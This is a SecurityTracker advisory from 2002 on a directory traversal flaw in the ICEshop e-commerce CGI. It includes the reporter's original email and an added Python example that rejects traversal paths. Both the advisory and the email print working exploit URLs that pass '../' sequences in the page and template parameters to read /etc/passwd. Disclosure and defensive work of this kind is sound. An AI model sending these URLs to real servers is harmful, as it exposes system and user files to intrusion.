SecurityTracker.com


 


Category:   Application (Commerce)  >   ICEshop
Vendors:   ICEshop BV
ICEshop E-commerce Software Directory Traversal Flaw Discloses Files on the Server to Remote Users
SecurityTracker Alert ID:  1003360
SecurityTracker URL:  http://securitytracker.com/id/1003360
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 25 2002
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  

Description:   An information disclosure vulnerability was reported in the ICEshop e-commerce system. A remote user can view files on the server.

It is reported that ICEshop fails to filter '../' strings from user-supplied URLs. A remote user can send a specially crafted URL to traverse the directory and view files located anywhere on the server that are readable by the web server.

The following types of URLs will reportedly trigger the vulnerability:

http://[targethost]/takeitnow/store/ice.cgi?a_scap=1&d_prid=&d_catg=64&d_word=&page=../../../../../../../../../../../etc/passwd

http://[targethost]/ice.cgi?a_spit=1&template=../../../../../../../etc/passwd&d_prid=538337

[Editor's note: The vendor has been unable to confirm this vulnerability. Their current release version appears not to be vulnerable.]

Impact:   A remote user can view files on the server that are readable by the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.iceshop.nl/iceshop/index.html
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
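
The input validation this entry reports as missing, as an added example (not ICEshop code and not part of the original advisory): the value of the `page` or `template` parameter is resolved against a fixed template directory and rejected if the real path falls outside it. The function names, the template root and the host `shop.example` are assumptions made for illustration.

```python
import os
import tempfile
from urllib.parse import parse_qs, urlsplit

class TemplatePathError(ValueError):
    """The requested template is missing or resolves outside the root."""

def resolve_template(root, requested):
    """Return the real path of `requested` inside `root`, or raise."""
    if not requested or "\x00" in requested:
        raise TemplatePathError("empty or NUL-containing name")
    root_real = os.path.realpath(root)
    # join() + realpath() collapses "../" segments and follows symlinks,
    # so the containment check runs on the path the OS would really open.
    candidate = os.path.realpath(os.path.join(root_real, requested))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise TemplatePathError("escapes template root")
    if not os.path.isfile(candidate):
        raise TemplatePathError("no such template")
    return candidate

def check_request(root, url):
    """Validate the page= and template= parameters of one request URL."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    verdicts = {}
    for name in ("page", "template"):
        for value in query.get(name, []):
            try:
                verdicts[name] = ("ok", resolve_template(root, value))
            except TemplatePathError as exc:
                verdicts[name] = ("rejected", str(exc))
    return verdicts

def build_demo_root():
    """Create a constructed template tree holding two legitimate files."""
    root = tempfile.mkdtemp(prefix="ice_templates_")
    os.makedirs(os.path.join(root, "Html", "fp"))
    for rel in ("Html/fp/cat_camera.html", "pro_templ1.html"):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("<html>constructed sample</html>")
    return root

if __name__ == "__main__":
    root = build_demo_root()
    base = "http://shop.example/ice.cgi?"  # constructed host
    for qs in ("a_spit=1&template=pro_templ1.html&d_prid=538337",
               "a_spit=1&template=../../../../../../../etc/passwd&d_prid=538337"):
        print(qs, "->", check_request(root, base + qs))
```

Checking the resolved path rather than searching the raw string for '../' also covers absolute paths and symlinks that point outside the template directory.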

Message History:   None.


 Source Message Contents

Subject:  iceshop


-------- Original Message --------
   From: "Alexey Sintsov" <don_huan@xakep.ru>
Subject: iceshop
     To: <bugs@securitytracker.com>

Iceshop doesn't filter "../", which allows viewing files on the server. To work
we need arguments; instead of the template file, put for example
"../../../../../../etc/passwd".

Ex.

http://www.server.nl/takeitnow/store/ice.cgi?a_scap=1&d_prid=&d_catg=64&d_word=&page=./Html/fp/cat_camera.html

http://www.server.nl/takeitnow/store/ice.cgi?a_scap=1&d_prid=&d_catg=64&d_word=&page=../../../../../../../../../../../etc/passwd

or

http://www.server2.com/ice.cgi?a_spit=1&template=pro_templ1.html&d_prid=538337

http://www.server2.com/ice.cgi?a_spit=1&template=../../../../../../../etc/passwd&d_prid=538337

Don Huan aka Alexey Sintsov



 
 



Copyright 2022, SecurityGlobal.net LLC